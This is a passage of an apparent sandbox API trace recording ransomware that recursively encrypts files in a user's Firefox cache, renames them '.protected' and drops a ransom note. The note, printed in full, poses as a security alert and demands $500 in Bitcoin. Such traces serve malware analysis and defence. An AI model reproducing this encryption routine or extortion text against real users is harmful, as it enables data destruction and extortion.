nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.085] lstrlenA (lpString="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") returned 684 [0086.085] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.085] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.085] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, 
lpOverlapped=0x0) returned 1 [0086.085] CloseHandle (hObject=0x15c) returned 1 [0086.085] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.085] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.085] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\RESTORE_FILES.txt") returned 115 [0086.085] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.086] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.086] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.087] lstrlenA (lpString="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") returned 684 [0086.087] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0086.087] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.087] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, 
lpOverlapped=0x0) returned 1 [0086.087] CloseHandle (hObject=0x158) returned 1 [0086.088] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.088] lstrcmpiW (lpString1="1", lpString2="Windows") returned -1 [0086.088] lstrcmpiW (lpString1="1", lpString2="Program Files") returned -1 [0086.088] lstrcmpiW (lpString1="1", lpString2="Program Files (x86)") returned -1 [0086.088] lstrcmpiW (lpString1="1", lpString2="$Recycle.bin") returned 1 [0086.088] lstrcmpiW (lpString1="1", lpString2="System Volume Information") returned -1 [0086.088] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1") returned 97 [0086.088] lstrcmpW (lpString1="1", lpString2=".") returned 1 [0086.088] lstrcmpW (lpString1="1", lpString2="..") returned 1 [0086.088] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\*") returned 99 [0086.089] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.089] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.089] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.089] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.089] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.089] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.089] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\.") returned 99 
[0086.089] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.089] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.089] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.089] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.089] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.089] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.089] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.089] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\..") returned 100 [0086.089] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.089] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.089] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.089] lstrcmpiW (lpString1="0B", lpString2="Windows") returned -1 [0086.089] lstrcmpiW (lpString1="0B", lpString2="Program Files") returned -1 [0086.089] lstrcmpiW (lpString1="0B", lpString2="Program Files (x86)") returned -1 [0086.089] lstrcmpiW (lpString1="0B", lpString2="$Recycle.bin") returned 1 [0086.089] lstrcmpiW (lpString1="0B", lpString2="System Volume Information") returned -1 [0086.089] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B") returned 100 [0086.089] lstrcmpW (lpString1="0B", lpString2=".") returned 1 [0086.089] lstrcmpW (lpString1="0B", lpString2="..") returned 1 [0086.090] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\*") 
returned 102 [0086.090] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0086.090] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.090] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.090] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.090] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.090] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.090] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\.") returned 102 [0086.090] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.090] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.091] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.091] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.091] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.091] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.091] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.091] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\..") returned 103 [0086.091] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.091] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.091] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.091] lstrcmpiW (lpString1="FCBF5d01", lpString2="Windows") returned -1 
[0086.091] lstrcmpiW (lpString1="FCBF5d01", lpString2="Program Files") returned -1 [0086.091] lstrcmpiW (lpString1="FCBF5d01", lpString2="Program Files (x86)") returned -1 [0086.091] lstrcmpiW (lpString1="FCBF5d01", lpString2="$Recycle.bin") returned 1 [0086.091] lstrcmpiW (lpString1="FCBF5d01", lpString2="System Volume Information") returned -1 [0086.091] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01") returned 109 [0086.091] StrStrIW (lpFirst="FCBF5d01", lpSrch=".protected") returned 0x0 [0086.091] lstrcmpW (lpString1="FCBF5d01", lpString2="RESTORE_FILES.txt") returned -1 [0086.091] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.091] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.091] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\0b\\fcbf5d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.092] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01") returned 109 [0086.092] StrStrW (lpFirst="FCBF5d01", lpSrch=".txt") returned 0x0 [0086.092] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01") returned 109 [0086.092] StrStrW (lpFirst="FCBF5d01", lpSrch=".rar") returned 0x0 
[0086.092] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01") returned 109 [0086.092] StrStrW (lpFirst="FCBF5d01", lpSrch=".zip") returned 0x0 [0086.092] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.102] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.102] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.102] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.102] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.111] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.112] CloseHandle (hObject=0x160) returned 1 [0086.112] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01.protected") returned 119 [0086.112] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\0b\\fcbf5d01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\0b\\fcbf5d01.protected")) returned 1 [0086.113] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.113] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.113] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\RESTORE_FILES.txt") returned 118 [0086.113] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\0b\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.114] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.114] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.114] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.114] WriteFile (in: hFile=0x15c, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.114] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.115] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0086.115] CloseHandle (hObject=0x15c) returned 1 [0086.115] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.115] lstrcmpiW (lpString1="C2", lpString2="Windows") returned -1 [0086.115] lstrcmpiW (lpString1="C2", lpString2="Program Files") returned -1 [0086.115] lstrcmpiW (lpString1="C2", lpString2="Program Files (x86)") returned -1 [0086.115] lstrcmpiW (lpString1="C2", lpString2="$Recycle.bin") returned 1 [0086.115] lstrcmpiW (lpString1="C2", lpString2="System Volume Information") returned -1 [0086.115] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2") returned 100 [0086.115] lstrcmpW (lpString1="C2", lpString2=".") returned 1 [0086.115] lstrcmpW (lpString1="C2", lpString2="..") returned 1 [0086.115] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\*") returned 102 [0086.115] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\*", lpFindFileData=0x295de10 | out: 
lpFindFileData=0x295de10) returned 0x47bb90 [0086.116] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.116] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.116] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.116] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.116] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.116] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\.") returned 102 [0086.116] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.116] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.116] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.116] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.116] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.116] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.116] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.116] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\..") returned 103 [0086.116] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.116] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.116] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.116] lstrcmpiW (lpString1="0B619d01", lpString2="Windows") returned -1 [0086.116] lstrcmpiW (lpString1="0B619d01", lpString2="Program Files") returned -1 [0086.116] lstrcmpiW (lpString1="0B619d01", lpString2="Program Files (x86)") returned -1 [0086.116] lstrcmpiW (lpString1="0B619d01", 
lpString2="$Recycle.bin") returned 1 [0086.116] lstrcmpiW (lpString1="0B619d01", lpString2="System Volume Information") returned -1 [0086.116] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01") returned 109 [0086.116] StrStrIW (lpFirst="0B619d01", lpSrch=".protected") returned 0x0 [0086.116] lstrcmpW (lpString1="0B619d01", lpString2="RESTORE_FILES.txt") returned -1 [0086.117] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.117] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.117] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\c2\\0b619d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.117] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01") returned 109 [0086.117] StrStrW (lpFirst="0B619d01", lpSrch=".txt") returned 0x0 [0086.117] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01") returned 109 [0086.117] StrStrW (lpFirst="0B619d01", lpSrch=".rar") returned 0x0 [0086.117] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01") returned 109 [0086.117] StrStrW (lpFirst="0B619d01", 
lpSrch=".zip") returned 0x0 [0086.117] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.158] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.158] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.158] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.159] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.159] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.159] CloseHandle (hObject=0x160) returned 1 [0086.159] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01.protected") returned 119 [0086.159] MoveFileW 